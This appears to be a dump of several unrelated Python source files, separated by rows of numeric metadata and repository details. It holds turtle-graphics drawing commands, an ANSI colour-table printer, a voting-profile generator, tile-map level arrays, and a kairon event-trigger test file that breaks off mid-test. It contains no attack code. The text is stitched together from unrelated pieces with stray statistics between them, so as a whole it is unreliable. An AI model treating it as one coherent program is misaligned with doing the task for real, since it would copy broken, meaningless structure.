pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((183.17,351.08), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((183.17,351.08)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((183.17,351.08), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((183.17,351.08)), setheading(22.5) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((183.17,351.08), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((183.17,351.08), 0.0), ((197.95,344.95), 315.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((197.95,344.95)), setheading(315.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((183.17,351.08), 0.0), ((197.95,344.95), 337.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((197.95,344.95)), setheading(337.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((183.17,351.08), 0.0), ((213.95,344.95), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((213.95,344.95)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((183.17,351.08), 0.0), ((213.95,344.95), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((213.95,344.95)), setheading(0.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((183.17,351.08), 0.0), ((228.73,351.08), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((228.73,351.08)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((183.17,351.08), 0.0), ((228.73,351.08), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((228.73,351.08)), setheading(22.5) ;
pu(), setposition((183.17,351.08)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((183.17,351.08), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((183.17,351.08), 22.5), ((194.48,362.39), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((194.48,362.39)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((183.17,351.08), 22.5), ((194.48,362.39), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((194.48,362.39)), setheading(45.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((183.17,351.08), 22.5), ((209.26,368.51), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((209.26,368.51)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((183.17,351.08), 22.5), ((209.26,368.51), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((209.26,368.51)), setheading(22.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((183.17,351.08), 22.5), ((225.26,368.51), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((225.26,368.51)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((183.17,351.08), 22.5), ((225.26,368.51), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((225.26,368.51)), setheading(0.0) ;
pu(), setposition((183.17,351.08)), setheading(22.5) ;
pu(), setposition((118.73,286.64)), setheading(45.0) ;
pu(), setposition((48.98,118.26)), setheading(67.5) ;
exitonclick()
update()
| 28.459187
| 121
| 0.514865
| 64,210
| 316,580
| 2.538483
| 0.005513
| 0.102536
| 0.125647
| 0.150777
| 0.999607
| 0.999055
| 0.998485
| 0.997945
| 0.997153
| 0.994914
| 0
| 0.306437
| 0.15266
| 316,580
| 11,124
| 122
| 28.459187
| 0.301188
| 0
| 0
| 0.869561
| 0
| 0
| 0.000016
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.00009
| 0
| 0.00009
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
8988f0cd17ccaa06cb643386f8e3b27364de2d71
| 563
|
py
|
Python
|
Python/Mundo 1/Tabela de cores ANSI.py
|
Breno-Andrade/Curso-em-Video
|
ccaf4d7cbdebfcdaed7f9b4421c40911ba935139
|
[
"MIT"
] | null | null | null |
Python/Mundo 1/Tabela de cores ANSI.py
|
Breno-Andrade/Curso-em-Video
|
ccaf4d7cbdebfcdaed7f9b4421c40911ba935139
|
[
"MIT"
] | null | null | null |
Python/Mundo 1/Tabela de cores ANSI.py
|
Breno-Andrade/Curso-em-Video
|
ccaf4d7cbdebfcdaed7f9b4421c40911ba935139
|
[
"MIT"
] | null | null | null |
print("Tabela de Cores ANSI")
print("==" * 10)
print("Texto, Fundo, Estilo")
print(" \033[30m30\033[m \033[40m40\033[m \033[0m0\033[m")
print(" \033[31m31\033[m \033[41m41\033[m \033[1m1\033[m")
print(" \033[32m32\033[m \033[42m42\033[m \033[4m4\033[m")
print(" \033[33m33\033[m \033[43m43\033[m \033[7m7\033[m")
print(" \033[34m34\033[m \033[44m44\033[m")
print(" \033[35m35\033[m \033[45m45\033[m")
print(" \033[36m36\033[m \033[46m46\033[m")
print(" \033[37m37\033[m \033[47m47\033[m")
print("\033[m==" * 10)
| 46.916667
| 67
| 0.591474
| 103
| 563
| 3.23301
| 0.300971
| 0.252252
| 0.252252
| 0.288288
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.422505
| 0.16341
| 563
| 12
| 68
| 46.916667
| 0.284501
| 0
| 0
| 0
| 0
| 0.333333
| 0.769504
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 9
|
89bd94e9552c87e2ec6c150e58fc4fde58fcfba4
| 1,287
|
py
|
Python
|
mapel/marriages/models/impartial.py
|
kaszperro/mapel
|
d4e6486ee97f5d5a5a737c581ba3f9f874ebcef3
|
[
"MIT"
] | null | null | null |
mapel/marriages/models/impartial.py
|
kaszperro/mapel
|
d4e6486ee97f5d5a5a737c581ba3f9f874ebcef3
|
[
"MIT"
] | null | null | null |
mapel/marriages/models/impartial.py
|
kaszperro/mapel
|
d4e6486ee97f5d5a5a737c581ba3f9f874ebcef3
|
[
"MIT"
] | null | null | null |
import numpy as np
def generate_ic_votes(num_agents: int = None, params=None):
return [list(np.random.permutation(num_agents)) for _ in range(num_agents)]
def generate_id_votes(num_agents: int = None, params=None):
return [list(range(num_agents)) for _ in range(num_agents)]
def generate_asymmetric_votes(num_agents: int = None, params=None):
votes = [list(range(num_agents)) for _ in range(num_agents)]
return [rotate(vote, shift) for shift, vote in enumerate(votes)]
# def generate_ic__id_votes(num_agents: int = None, params=None):
#
# votes_1 = [list(np.random.permutation(num_agents)) for _ in range(num_agents)]
# votes_2 = [list(range(num_agents)) for _ in range(num_agents)]
#
# return [votes_1, votes_2]
#
#
# def generate_asymmetric__id_votes(num_agents: int = None, params=None):
# votes = [list(range(num_agents)) for _ in range(num_agents)]
#
# votes_1 = [rotate(vote, shift) for shift, vote in enumerate(votes)]
# votes_2 = [list(range(num_agents)) for _ in range(num_agents)]
#
# return [votes_1, votes_2]
# HELPER
def rotate(vector, shift):
shift = shift % len(vector)
return vector[shift:] + vector[:shift]
# # # # # # # # # # # # # # # #
# LAST CLEANUP ON: 14.10.2021 #
# # # # # # # # # # # # # # # #
| 27.978261
| 84
| 0.666667
| 184
| 1,287
| 4.402174
| 0.201087
| 0.211111
| 0.207407
| 0.120988
| 0.792593
| 0.792593
| 0.792593
| 0.792593
| 0.783951
| 0.464198
| 0
| 0.015253
| 0.184926
| 1,287
| 45
| 85
| 28.6
| 0.756911
| 0.465423
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.363636
| false
| 0
| 0.090909
| 0.181818
| 0.818182
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 10
|
982bebf722a1cc85dccd7c929214dc83b3999ea2
| 1,561
|
py
|
Python
|
Scripts/lvl.py
|
cvtsh248/V-For-Ved
|
47542dd66ca3c3b8efad0141de60247eeca6931d
|
[
"MIT"
] | 1
|
2020-05-20T00:55:13.000Z
|
2020-05-20T00:55:13.000Z
|
Scripts/lvl.py
|
cvtsh248/V-For-Ved
|
47542dd66ca3c3b8efad0141de60247eeca6931d
|
[
"MIT"
] | null | null | null |
Scripts/lvl.py
|
cvtsh248/V-For-Ved
|
47542dd66ca3c3b8efad0141de60247eeca6931d
|
[
"MIT"
] | null | null | null |
#NOTE: PLAYER CANNOT GO TO LAST COLUMN
levelA = [[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,3,0,0,0,0,0,0,0,3,0,0,0,0,0],
[0,0,0,0,0,3,1,3,0,0,0,0,0,0,0,0,0,0,0,0],
[0,3,3,3,3,2,1,2,3,3,0,0,3,0,0,0,0,0,0,0],
[3,2,2,1,1,2,2,1,2,1,3,3,2,3,1,3,3,3,3,3]]
level = [[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,3,3,0,0,0],
[0,0,0,0,0,0,3,0,0,0,0,0,0,0,3,0,0,0,0,0,3,2,1,3,0,0],
[0,0,0,0,0,3,1,3,0,0,0,0,0,0,0,0,0,0,0,3,1,1,2,1,3,0],
[0,0,0,3,3,2,1,2,3,3,0,0,3,0,0,0,0,0,3,1,1,2,1,2,1,3],
[3,3,3,1,1,2,2,1,2,1,3,3,2,3,3,3,3,3,1,2,1,2,2,2,1,1],
[1,2,1,1,1,2,2,1,2,1,1,2,2,1,1,2,1,2,1,2,1,2,2,2,1,1],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]]
| 53.827586
| 63
| 0.413197
| 613
| 1,561
| 1.052202
| 0.021207
| 1.444961
| 2.088372
| 2.691473
| 0.936434
| 0.913178
| 0.893023
| 0.871318
| 0.846512
| 0.84186
| 0
| 0.462127
| 0.162716
| 1,561
| 29
| 64
| 53.827586
| 0.03137
| 0.023703
| 0
| 0.461538
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 12
|
982f979a4af3256ac530fcf726d99b4a445e60f2
| 49,061
|
py
|
Python
|
tests/unit_test/events/events_test.py
|
rit1200/kairon
|
674a491f6deeae4800825ca93e0726e4fb6e0866
|
[
"Apache-2.0"
] | 9
|
2020-04-22T12:49:29.000Z
|
2020-06-13T22:23:20.000Z
|
tests/unit_test/events/events_test.py
|
rit1200/kairon
|
674a491f6deeae4800825ca93e0726e4fb6e0866
|
[
"Apache-2.0"
] | 18
|
2020-04-20T12:39:20.000Z
|
2020-05-21T05:10:51.000Z
|
tests/unit_test/events/events_test.py
|
rit1200/kairon
|
674a491f6deeae4800825ca93e0726e4fb6e0866
|
[
"Apache-2.0"
] | 13
|
2020-04-21T12:12:40.000Z
|
2020-05-13T07:27:44.000Z
|
import json
import os
import shutil
import tempfile
from datetime import datetime
import uuid
import pytest
import responses
from mongoengine import connect
from rasa.shared.constants import DEFAULT_DOMAIN_PATH, DEFAULT_DATA_PATH, DEFAULT_CONFIG_PATH
from rasa.shared.importers.rasa import RasaFileImporter
from kairon import Utility
from kairon.shared.data.constant import EVENT_STATUS, REQUIREMENTS
from kairon.shared.data.data_objects import Configs, BotSettings
from kairon.shared.data.history_log_processor import HistoryDeletionLogProcessor
from kairon.shared.importer.processor import DataImporterLogProcessor
from kairon.shared.data.processor import MongoProcessor
from kairon.events.events import EventsTrigger
from kairon.shared.test.processor import ModelTestingLogProcessor
from kairon.test.test_models import ModelTester
class TestEvents:
@pytest.fixture(scope='class', autouse=True)
def init(self):
os.environ["system_file"] = "./tests/testing_data/system.yaml"
Utility.load_environment()
connect(**Utility.mongoengine_connection(Utility.environment['database']["url"]))
tmp_dir = tempfile.mkdtemp()
pytest.tmp_dir = tmp_dir
from rasa import train
# model without entities
train_result = train(
domain='tests/testing_data/model_tester/domain.yml',
config='tests/testing_data/model_tester/config.yml',
training_files=['tests/testing_data/model_tester/nlu_with_entities/nlu.yml',
'tests/testing_data/model_tester/training_stories_success/stories.yml'],
output='tests/testing_data/model_tester/models',
core_additional_arguments={"augmentation_factor": 100},
force_training=True
)
pytest.model_path = train_result.model
yield None
shutil.rmtree(tmp_dir)
shutil.rmtree('models/test_events_bot')
@pytest.fixture()
def get_training_data(self):
async def _read_and_get_data(path: str):
domain_path = os.path.join(path, DEFAULT_DOMAIN_PATH)
training_data_path = os.path.join(path, DEFAULT_DATA_PATH)
config_path = os.path.join(path, DEFAULT_CONFIG_PATH)
http_actions_path = os.path.join(path, 'actions.yml')
importer = RasaFileImporter.load_from_config(config_path=config_path,
domain_path=domain_path,
training_data_paths=training_data_path)
domain = await importer.get_domain()
story_graph = await importer.get_stories()
config = await importer.get_config()
nlu = await importer.get_nlu_data(config.get('language'))
http_actions = Utility.read_yaml(http_actions_path)
return nlu, story_graph, domain, config, http_actions
return _read_and_get_data
@pytest.mark.asyncio
async def test_trigger_data_importer_validate_only(self, monkeypatch):
bot = 'test_events'
user = 'test'
test_data_path = os.path.join(pytest.tmp_dir, str(uuid.uuid4()))
shutil.copytree('tests/testing_data/validator/valid', test_data_path)
def _path(*args, **kwargs):
return test_data_path
monkeypatch.setattr(Utility, "get_latest_file", _path)
DataImporterLogProcessor.add_log(bot, user, files_received=REQUIREMENTS-{"http_actions"})
await EventsTrigger.trigger_data_importer(bot, user, True, False)
logs = list(DataImporterLogProcessor.get_logs(bot))
assert len(logs) == 1
assert not logs[0].get('intents').get('data')
assert not logs[0].get('stories').get('data')
assert not logs[0].get('utterances').get('data')
assert [action.get('data') for action in logs[0].get('actions') if action.get('type') == 'http_actions']
assert not logs[0].get('training_examples').get('data')
assert not logs[0].get('domain').get('data')
assert not logs[0].get('config').get('data')
assert not logs[0].get('exception')
assert logs[0]['is_data_uploaded']
assert logs[0]['start_timestamp']
assert logs[0]['end_timestamp']
assert logs[0]['status'] == 'Success'
assert logs[0]['event_status'] == EVENT_STATUS.COMPLETED.value
@pytest.mark.asyncio
async def test_trigger_data_importer_validate_exception(self, monkeypatch):
bot = 'test_events'
user = 'test'
test_data_path = os.path.join(pytest.tmp_dir, str(uuid.uuid4()))
os.mkdir(test_data_path)
def _path(*args, **kwargs):
return test_data_path
monkeypatch.setattr(Utility, "get_latest_file", _path)
DataImporterLogProcessor.add_log(bot, user, files_received=REQUIREMENTS - {"domain", "http_actions"})
await EventsTrigger.trigger_data_importer(bot, user, False, False)
logs = list(DataImporterLogProcessor.get_logs(bot))
assert len(logs) == 2
assert not logs[0].get('intents').get('data')
assert not logs[0].get('stories').get('data')
assert not logs[0].get('utterances').get('data')
assert not [action.get('data') for action in logs[0].get('actions') if action.get('type') == 'http_actions']
assert not logs[0].get('training_examples').get('data')
assert not logs[0].get('domain').get('data')
assert not logs[0].get('config').get('data')
assert logs[0].get('exception') == 'Some training files are absent!'
assert logs[0]['is_data_uploaded']
assert logs[0]['start_timestamp']
assert logs[0]['end_timestamp']
assert logs[0]['status'] == 'Failure'
assert logs[0]['event_status'] == EVENT_STATUS.FAIL.value
@pytest.mark.asyncio
async def test_trigger_data_importer_validate_invalid_yaml(self, monkeypatch):
bot = 'test_events'
user = 'test'
test_data_path = os.path.join(pytest.tmp_dir, str(uuid.uuid4()))
shutil.copytree('tests/testing_data/validator/invalid_yaml', test_data_path)
def _path(*args, **kwargs):
return test_data_path
monkeypatch.setattr(Utility, "get_latest_file", _path)
DataImporterLogProcessor.add_log(bot, user, files_received=REQUIREMENTS - {"domain", "http_actions"})
await EventsTrigger.trigger_data_importer(bot, user, True, False)
logs = list(DataImporterLogProcessor.get_logs(bot))
assert len(logs) == 3
assert not logs[0].get('intents').get('data')
assert not logs[0].get('stories').get('data')
assert not logs[0].get('utterances').get('data')
assert not [action.get('data') for action in logs[0].get('actions') if action.get('type') == 'http_actions']
assert not logs[0].get('training_examples').get('data')
assert not logs[0].get('domain').get('data')
assert not logs[0].get('config').get('data')
assert logs[0].get('exception').__contains__('Failed to read YAML')
assert logs[0]['is_data_uploaded']
assert logs[0]['start_timestamp']
assert logs[0]['end_timestamp']
assert logs[0]['status'] == 'Failure'
assert logs[0]['event_status'] == EVENT_STATUS.FAIL.value
@pytest.mark.asyncio
async def test_trigger_data_importer_validate_invalid_domain(self, monkeypatch):
bot = 'test_events'
user = 'test'
test_data_path = os.path.join(pytest.tmp_dir, str(uuid.uuid4()))
nlu_path = os.path.join(pytest.tmp_dir, str(uuid.uuid4()), 'data')
shutil.copytree('tests/testing_data/validator/invalid_domain', test_data_path)
shutil.copytree('tests/testing_data/validator/valid/data', nlu_path)
shutil.copy2('tests/testing_data/validator/valid/config.yml', test_data_path)
def _path(*args, **kwargs):
return test_data_path
monkeypatch.setattr(Utility, "get_latest_file", _path)
DataImporterLogProcessor.add_log(bot, user, files_received=REQUIREMENTS - {"rules", "http_actions"})
await EventsTrigger.trigger_data_importer(bot, user, True, False)
logs = list(DataImporterLogProcessor.get_logs(bot))
assert logs[0].get('exception') == ('Failed to load domain.yml. Error: \'Duplicate entities in domain. These '
'entities occur more than once in the domain: \'location\'.\'')
assert logs[0]['is_data_uploaded']
assert logs[0]['start_timestamp']
assert logs[0]['end_timestamp']
assert logs[0]['status'] == 'Failure'
assert logs[0]['event_status'] == EVENT_STATUS.FAIL.value
@pytest.mark.asyncio
async def test_trigger_data_importer_validate_file_with_errors(self, monkeypatch):
bot = 'test_events'
user = 'test'
test_data_path = os.path.join(pytest.tmp_dir, str(uuid.uuid4()))
shutil.copytree('tests/testing_data/validator/intent_name_mismatch', test_data_path)
def _path(*args, **kwargs):
return test_data_path
monkeypatch.setattr(Utility, "get_latest_file", _path)
DataImporterLogProcessor.add_log(bot, user, files_received=REQUIREMENTS - {"http_actions"})
await EventsTrigger.trigger_data_importer(bot, user, True, False)
logs = list(DataImporterLogProcessor.get_logs(bot))
assert len(logs) == 5
assert logs[0].get('intents').get('data')
assert not logs[0].get('stories').get('data')
assert not logs[0].get('utterances').get('data')
assert [action.get('data') for action in logs[0].get('actions') if action.get('type') == 'http_actions']
assert not logs[0].get('training_examples').get('data')
assert not logs[0].get('domain').get('data')
assert not logs[0].get('config').get('data')
assert not logs[0].get('exception')
assert logs[0]['is_data_uploaded']
assert logs[0]['start_timestamp']
assert logs[0]['end_timestamp']
assert logs[0]['status'] == 'Failure'
assert logs[0]['event_status'] == EVENT_STATUS.COMPLETED.value
@pytest.mark.asyncio
async def test_trigger_data_importer_validate_and_save_overwrite(self, monkeypatch):
bot = 'test_events'
user = 'test'
test_data_path = os.path.join(pytest.tmp_dir, str(uuid.uuid4()))
shutil.copytree('tests/testing_data/validator/valid', test_data_path)
def _path(*args, **kwargs):
return test_data_path
monkeypatch.setattr(Utility, "get_latest_file", _path)
DataImporterLogProcessor.add_log(bot, user, files_received=REQUIREMENTS - {"http_actions"})
await EventsTrigger.trigger_data_importer(bot, user, True, True)
logs = list(DataImporterLogProcessor.get_logs(bot))
assert len(logs) == 6
assert not logs[0].get('intents').get('data')
assert not logs[0].get('stories').get('data')
assert not logs[0].get('utterances').get('data')
assert [action.get('data') for action in logs[0].get('actions') if action.get('type') == 'http_actions']
assert not logs[0].get('training_examples').get('data')
assert not logs[0].get('domain').get('data')
assert not logs[0].get('config').get('data')
assert not logs[0].get('exception')
assert logs[0]['is_data_uploaded']
assert logs[0]['start_timestamp']
assert logs[0]['end_timestamp']
assert logs[0]['status'] == 'Success'
assert logs[0]['event_status'] == EVENT_STATUS.COMPLETED.value
processor = MongoProcessor()
assert 'greet' in processor.fetch_intents(bot)
assert 'deny' in processor.fetch_intents(bot)
assert len(processor.fetch_stories(bot)) == 2
assert len(list(processor.fetch_training_examples(bot))) == 7
assert len(list(processor.fetch_responses(bot))) == 4
assert len(processor.fetch_actions(bot)) == 2
assert len(processor.fetch_rule_block_names(bot)) == 4
@pytest.mark.asyncio
async def test_trigger_data_importer_validate_and_save_append(self, monkeypatch):
bot = 'test_events'
user = 'test'
test_data_path = os.path.join(pytest.tmp_dir, str(uuid.uuid4()))
shutil.copytree('tests/testing_data/validator/append', test_data_path)
def _path(*args, **kwargs):
return test_data_path
monkeypatch.setattr(Utility, "get_latest_file", _path)
DataImporterLogProcessor.add_log(bot, user, files_received=REQUIREMENTS - {"http_actions", "rules"})
await EventsTrigger.trigger_data_importer(bot, user, True, False)
logs = list(DataImporterLogProcessor.get_logs(bot))
assert len(logs) == 7
assert not logs[0].get('intents').get('data')
assert not logs[0].get('stories').get('data')
assert not logs[0].get('utterances').get('data')
assert [action.get('data') for action in logs[0].get('actions') if action.get('type') == 'http_actions']
assert not logs[0].get('training_examples').get('data')
assert not logs[0].get('domain').get('data')
assert not logs[0].get('config').get('data')
assert not logs[0].get('exception')
assert logs[0]['is_data_uploaded']
assert logs[0]['start_timestamp']
assert logs[0]['end_timestamp']
assert logs[0]['status'] == 'Success'
assert logs[0]['event_status'] == EVENT_STATUS.COMPLETED.value
processor = MongoProcessor()
assert 'greet' in processor.fetch_intents(bot)
assert 'deny' in processor.fetch_intents(bot)
assert 'location' in processor.fetch_intents(bot)
assert 'affirm' in processor.fetch_intents(bot)
assert len(processor.fetch_stories(bot)) == 4
assert len(list(processor.fetch_training_examples(bot))) == 13
assert len(list(processor.fetch_responses(bot))) == 6
assert len(processor.fetch_actions(bot)) == 4
assert len(processor.fetch_rule_block_names(bot)) == 4
@pytest.mark.asyncio
async def test_trigger_data_importer_validate_and_save_overwrite_same_user(self, monkeypatch):
bot = 'test_events'
user = 'test'
test_data_path = os.path.join(pytest.tmp_dir, str(uuid.uuid4()))
shutil.copytree('tests/testing_data/validator/valid', test_data_path)
def _path(*args, **kwargs):
return test_data_path
monkeypatch.setattr(Utility, "get_latest_file", _path)
DataImporterLogProcessor.add_log(bot, user, files_received=REQUIREMENTS - {"http_actions"})
await EventsTrigger.trigger_data_importer(bot, user, True, True)
logs = list(DataImporterLogProcessor.get_logs(bot))
assert len(logs) == 8
assert not logs[0].get('intents').get('data')
assert not logs[0].get('stories').get('data')
assert not logs[0].get('utterances').get('data')
assert [action.get('data') for action in logs[0].get('actions') if action.get('type') == 'http_actions']
assert not logs[0].get('training_examples').get('data')
assert not logs[0].get('domain').get('data')
assert not logs[0].get('config').get('data')
assert not logs[0].get('exception')
assert logs[0]['is_data_uploaded']
assert logs[0]['start_timestamp']
assert logs[0]['end_timestamp']
assert logs[0]['status'] == 'Success'
assert logs[0]['event_status'] == EVENT_STATUS.COMPLETED.value
processor = MongoProcessor()
assert 'greet' in processor.fetch_intents(bot)
assert 'deny' in processor.fetch_intents(bot)
assert len(processor.fetch_stories(bot)) == 2
assert len(list(processor.fetch_training_examples(bot))) == 7
assert len(list(processor.fetch_responses(bot))) == 4
assert len(processor.fetch_actions(bot)) == 2
assert len(processor.fetch_rule_block_names(bot)) == 4
@pytest.mark.asyncio
async def test_trigger_data_importer_validate_event(self, monkeypatch):
bot = 'test_events_bot'
user = 'test_user'
event_url = "http://url.event"
monkeypatch.setitem(Utility.environment['model']['data_importer'], "event_url", event_url)
responses.add("POST",
event_url,
json={"message": "Event triggered successfully!"},
status=200,
match=[
responses.json_params_matcher(
[{'name': 'BOT', 'value': bot}, {'name': 'USER', 'value': user},
{'name': 'IMPORT_DATA', 'value': '--import-data'},
{'name': 'OVERWRITE', 'value': ''}])],
)
responses.start()
await EventsTrigger.trigger_data_importer(bot, user, True, False)
responses.stop()
logs = list(DataImporterLogProcessor.get_logs(bot))
assert len(logs) == 1
assert not logs[0].get('intents').get('data')
assert not logs[0].get('stories').get('data')
assert not logs[0].get('utterances').get('data')
assert not [action.get('data') for action in logs[0].get('actions') if action.get('type') == 'http_actions']
assert not logs[0].get('training_examples').get('data')
assert not logs[0].get('domain').get('data')
assert not logs[0].get('config').get('data')
assert not logs[0].get('exception')
assert logs[0]['is_data_uploaded']
assert logs[0]['start_timestamp']
assert not logs[0].get('end_timestamp')
assert not logs[0].get('status')
assert logs[0]['event_status'] == EVENT_STATUS.TASKSPAWNED.value
@pytest.mark.asyncio
async def test_trigger_data_importer_validate_and_save_event_overwrite(self, monkeypatch):
bot = 'test_events_bot_1'
user = 'test_user'
event_url = "http://url.event2"
monkeypatch.setitem(Utility.environment['model']['data_importer'], "event_url", event_url)
responses.add("POST",
event_url,
json={"message": "Event triggered successfully!"},
status=200,
match=[
responses.json_params_matcher(
[{'name': 'BOT', 'value': bot}, {'name': 'USER', 'value': user},
{'name': 'IMPORT_DATA', 'value': '--import-data'},
{'name': 'OVERWRITE', 'value': '--overwrite'}])],
)
responses.start()
await EventsTrigger.trigger_data_importer(bot, user, True, True)
responses.stop()
request = json.loads(responses.calls[1].request.body)
logs = list(DataImporterLogProcessor.get_logs(bot))
assert len(logs) == 1
